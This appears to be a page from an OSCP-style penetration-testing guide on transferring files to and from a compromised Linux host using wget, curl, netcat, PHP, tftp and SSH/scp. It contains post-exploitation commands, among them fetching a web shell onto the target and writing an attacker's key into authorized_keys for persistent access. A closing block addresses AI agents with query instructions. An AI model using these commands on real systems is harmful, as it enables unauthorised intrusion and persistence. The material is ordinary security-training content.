# Transferring Files on Linux

### Set Up a Simple Python Webserver <a href="#set-up-a-simple-python-webserver" id="set-up-a-simple-python-webserver"></a>

For the examples using `curl` and `wget` we need to download from a web-server. This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

```
python -m SimpleHTTPServer 9999
```

### Wget <a href="#wget" id="wget"></a>

You can download files using `wget` like this:

```
wget 192.168.1.102:9999/file.txt
```

### Curl <a href="#curl" id="curl"></a>

```
curl -O http://192.168.0.101/file.txt
```

### Netcat <a href="#netcat" id="netcat"></a>

Another easy way to transfer files is by using netcat.

If you can't have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can't do `ctr-c` because that will kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

```bash
nc -lvp 4444 < file
```

On target machine:

```bash
nc 192.168.1.102 4444 > file
```

You can of course also do it the risky way, the other way around:

So on the victim-machine we run `nc` like this:

```bash
nc -lvp 3333 > enum.sh
```

And on the attacking machine we send the file like this:

```bash
nc 192.168.1.103 < enum.sh
```

I have sometimes received this error:

```
This is nc from the netcat-openbsd package. An alternative nc is available
```

I have just run this command instead:

```
nc -l 1234 > file.sh
```

### With php <a href="#with-php" id="with-php"></a>

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### Ftp <a href="#ftp" id="ftp"></a>

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

### Tftp <a href="#tftp" id="tftp"></a>

On some rare machine we do not have access to `nc` and `wget`, or `curl`. But we might have access to `tftp`. Some versions of `tftp` are run interactively, like this:

```
$ tftp 192.168.0.101
tftp> get myfile.txt
```

If we can't run it interactively, for whatever reason, we can do this trick:

```
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
```

#### SSH - SCP <a href="#ssh---scp" id="ssh---scp"></a>

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the `/home/user` directory you can find the hidden `.ssh` files by typing `ls -la`. Then you need to do two things.

1. Create a new keypair

You do that with:

```
ssh-keygen -t rsa -C "your_email@example.com"
```

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id\_rsa): nameOfMyKey Enter passphrase (empty for no passphrase): Enter same passphrase again:

This will create two files, one called `nameOfMyKey` and another called `nameOfMyKey_pub`. The one with the `_pub` is of course your public key. And the other key is your private.

1. Add your public key to authorized\_keys.

Now you copy the content of `nameOfMyKey_pub`. On the compromised machine you go to `~/.ssh` and then run add the public key to the file authorized\_keys. Like this

```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys
```

1. Log in.

Now you should be all set to log in using your private key. Like this

```
ssh -i nameOfMyKey kim@192.168.1.103
```

#### SCP <a href="#scp" id="scp"></a>

Now we can copy files to a machine using `scp`

```
# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cybermuhdupa.gitbook.io/total-oscp-guide/scripting-with-python/transferring-files/transferring-files-on-linux.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.